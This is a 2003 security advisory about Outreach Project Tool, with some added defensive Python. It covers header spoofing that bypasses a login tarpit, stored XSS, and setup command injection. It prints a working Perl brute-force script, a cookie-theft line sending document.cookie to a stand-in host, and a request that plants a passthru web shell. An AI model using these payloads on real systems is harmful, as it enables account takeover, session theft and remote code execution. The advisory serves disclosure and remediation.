Outreach Project Tool

From: Martin Eiszner (martinat_private)
Date: Thu Jan 16 2003 - 07:52:15 PST


    to the list,
    
    
    2003/01/16 @meiat_private
    
    =====================================
    Outreach Project Tool
    =====================================
    
    Product: O.P.T (Version opt_0.946b / Earlier versions may be vulnerable too)
    
    Vendor: Lanifex (http://www.lanifex.com/business/business_en/products/815.html)
    License: GPL
    VendorStatus: Informed on Oct 2002
    VendorStatus: ---
    VendorPatch: ---
    
    Local: NO
    Remote: YES
    
    Vulnerabilities:
    1) Tarpit out-cheat (brute-force attack)
    2) Cross-Site-Scripting
    3) Setup
    
    Tested Platforms: Linux / Slackware 8.0 i686 / Apache 1.3.*
    
    Severity: MEDIUM
    
    
    ============
    Introduction
    ============
    
    The Outreach Project Tool was developed by CSO Lanifex GmbH to support communication with customers during project implementation. It has rapidly evolved into a highly effective Web-based collaboration system, which improves interaction between consultants and their clients, as well as a wide range of other applications.
    
    =====================
    Vulnerability Details
    =====================
    
    SUMMARY
    
    1) Request Header allows Tarpit - out-cheat
    2) Multiple XSS-problems in community/forums
    3) Setup (/opt/setup) permission issues
    
    B) Description of Vulnerabilities
    
    1) REQUEST-HEADER TARPIT - OUT-CHEAT
    
    The function "OPT_remote_IP()" (/opt/general.php) accepts the "X_FORWARDED_FOR" and "VIA"
    environment variables.
    
    This is done to identify possible proxy servers.
    Unfortunately these variables are populated from the HTTP request headers, so any client can set them.
    
    With the following HTTP request:
    ---*---
    GET /opt/whatever HTTP/1.1
    Host: whatever
    VIA: 1.2.3.4
    ---*---
    
    "$HTTP_VIA" (1.2.3.4) will be used as the user's IP address.
    
    Thus leading to:
    
    -Anonymous use of the application
    -Possibility of a brute-force attack against accounts
    
    Simple example for a brute-force attack against OPT:
    
    ---cut here---
    
    #!/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Request::Common;
    use HTTP::Response;
    my ($url,$uid,$pf) = @ARGV;
    open(P,"< $pf") || die "passf.?\n";
    my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
    while(<P>){ my $pwd = $_; chomp($pwd);
    my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
    my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
    my $hds = $res->headers; my $new = $hds->header("Location");
    my $res2 = $ua->request(GET "$new",%h); $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!! (second request re-issued on purpose)
    my $cod = $res2->code;
    my $pag = $res2->content;
    print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
    close (P);
    
    ---cut here---
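The check that defeats this tarpit out-cheat is to trust forwarding headers only when the TCP peer is a known proxy. The following Python is an added example, not code from the advisory or from OPT; it models the vulnerable header handling described above next to a hardened version and runs a login-failure tarpit over both, with a constructed proxy allowlist (10.0.0.5) and constructed addresses.

```python
import ipaddress
from collections import defaultdict

# Constructed allowlist (assumption): only this reverse proxy may set forwarding headers.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}

def remote_ip_vulnerable(env):
    """The pattern the advisory describes: a client-supplied Via or
    X-Forwarded-For header silently replaces the socket peer address."""
    for key in ("HTTP_VIA", "HTTP_X_FORWARDED_FOR"):
        if env.get(key):
            return env[key].split(",")[0].strip()
    return env["REMOTE_ADDR"]

def remote_ip_hardened(env):
    """Use the TCP peer address unless it is a trusted proxy; only then honour
    the first X-Forwarded-For entry, and only if it parses as an IP address."""
    peer = env["REMOTE_ADDR"]
    try:
        if ipaddress.ip_address(peer) not in TRUSTED_PROXIES:
            return peer
        forwarded = env.get("HTTP_X_FORWARDED_FOR", "").split(",")[0].strip()
        return str(ipaddress.ip_address(forwarded))
    except ValueError:
        return peer

class Tarpit:
    """Per-IP failed-login counter: after `limit` failures that IP is locked."""
    def __init__(self, limit=5):
        self.limit = limit
        self.failures = defaultdict(int)

    def allow(self, ip):
        return self.failures[ip] < self.limit

    def record_failure(self, ip):
        self.failures[ip] += 1

def simulate_guessing(ip_func, attempts=20):
    """Replay `attempts` failed logins from one socket address, each carrying a
    different (constructed) Via value. Returns how many the tarpit let through."""
    pit = Tarpit(limit=5)
    passed = 0
    for i in range(attempts):
        env = {"REMOTE_ADDR": "203.0.113.7", "HTTP_VIA": f"198.51.100.{i}"}
        ip = ip_func(env)
        if pit.allow(ip):
            passed += 1
            pit.record_failure(ip)
    return passed
```

With the vulnerable lookup every attempt appears to come from a new address and none is ever locked; with the hardened lookup the tarpit locks the real peer after five failures.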
    
    2) SEVERAL XSS VULNERABILITIES Help/Forums/and Others
    
    Typical XSS vulnerabilities exist in many/most of the community functions.
    
    Example:
    
    Once logged in, go to "Notes -> News -> Ad News"
    and create a news entry with script tags included:
    
    ---cut here---
    hello i am a news thing .. bla bla ...
    <script> alert(document.cookie); </script>
    ---cut here---
    
    Now every user who views it gets an alert window showing his own session-id (only as an example!!).
    
    Of course it is also possible to steal the OPT_Session cookie by having the script request
    another URL where a so-called cookie-theft handler is installed!!
    
    (location.href or window.open("http://badurl/theft?"+document.cookie,"a") ...)
    
    This vulnerability makes it possible, once logged in, to take over "any" other user's
    account (administrator included!).
    
    
    3) SETUP-ISSUES (/opt/setup)
    
    If the lockfile "lock01" in the setup_lock directory is not removed (due to
    wrong permission settings), or if someone is able/allowed to create a file "lock01",
    it is possible to:
    
    a) Create a new Setup
    b) Execute system commands through the setup.php script.
    
    This is because the "temp_CRM_dir" parameter is passed directly to the PHP-exec function.
    
    Example GET-Request:
    ---cut here---
    http://localhost/opt/setup/setup.php?
    CRM_email=opti@localhost
    &CRM_system_email=mei@localhost
    &CRM_path=/disk2/apps/opt/OPT_0.946b/opt
    &CRM_db_host=localhost&CRM_db_uname=opt
    &CRM_db_pwd=opt
    &CRM_db_db=opt
    &CRM_may_demo=0
    &temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php;
    &CRM_mail_fname=OPT_incoming_mail
    &action=Set up my OPT server
    ---cut here---
    
    The request above will create a script called "bad.php" with content <?passthru($c)?> in the
    OPT setup directory!
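The fix for issue 3 has two parts: the setup must be unreachable once lock01 is gone, and temp_CRM_dir must never reach a shell. The following Python is an added example (not OPT's code, and not the advisory's); function names, the allowlist pattern and the scratch directories are assumptions, and the decoded payload is kept only as a constructed test input to show it being rejected.

```python
import os
import re
import tempfile

# Decoded form of the advisory's temp_CRM_dir payload, kept only as a constructed test input.
INJECTED = "a;echo -e \\074?passthru\\050\\044c\\051?\\076 > bad.php;"
# Allowlist: one path component, no separators or shell metacharacters ('..' cannot match).
SAFE_DIR = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")

def temp_dir_is_safe(temp_dir):
    return bool(SAFE_DIR.match(temp_dir))

def create_temp_dir(base, temp_dir):
    """Hardened replacement for the exec() call: validate, then use the filesystem API, no shell."""
    if not temp_dir_is_safe(temp_dir):
        raise ValueError("temp_CRM_dir rejected: %r" % temp_dir)
    path = os.path.join(base, temp_dir)
    os.makedirs(path, exist_ok=True)
    return path

def setup_enabled(lock_dir):
    """Per the advisory, setup runs while setup_lock/lock01 exists; the hotfix removes it."""
    return os.path.isfile(os.path.join(lock_dir, "lock01"))

def run_setup(base, lock_dir, params):
    """Setup entry point: refuse when locked, then handle temp_CRM_dir safely."""
    if not setup_enabled(lock_dir):
        raise PermissionError("setup is locked: lock01 absent")
    return create_temp_dir(base, params["temp_CRM_dir"])

def demo():
    """Exercise both states in a scratch tree; returns (created, injection_rejected, locked_after_hotfix)."""
    with tempfile.TemporaryDirectory() as root:
        lock_dir = os.path.join(root, "setup_lock")
        os.makedirs(lock_dir)
        open(os.path.join(lock_dir, "lock01"), "w").close()  # fresh install: setup unlocked
        created = os.path.isdir(run_setup(root, lock_dir, {"temp_CRM_dir": "opt_tmp"}))
        try:
            run_setup(root, lock_dir, {"temp_CRM_dir": INJECTED})
            rejected = False
        except ValueError:
            rejected = not os.path.exists(os.path.join(root, "bad.php"))
        os.remove(os.path.join(lock_dir, "lock01"))  # the advisory's hotfix
        try:
            run_setup(root, lock_dir, {"temp_CRM_dir": "opt_tmp"})
            locked = False
        except PermissionError:
            locked = True
    return created, rejected, locked
```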
    
    
    =======
    Remarks
    =======
    
    ---
    
    ====================
    Recommended Hotfixes
    ====================
    
    After installation, check whether the file "lock01" exists in the setup_lock directory.
    If yes, remove it.
    
    The other vulnerabilities can only be fixed by software patches.
    
    
    EOF Martin Eiszner / @2002WebSec.org
    
    
    =======
    Contact
    =======
    
    WebSec.org / Martin Eiszner
    Gurkgasse 49/Top14
    1140 Vienna
    
    Austria / EUROPE
    meiat_private
    http://www.websec.org
                               
    



    This archive was generated by hypermail 2b30 : Fri Jan 17 2003 - 11:58:40 PST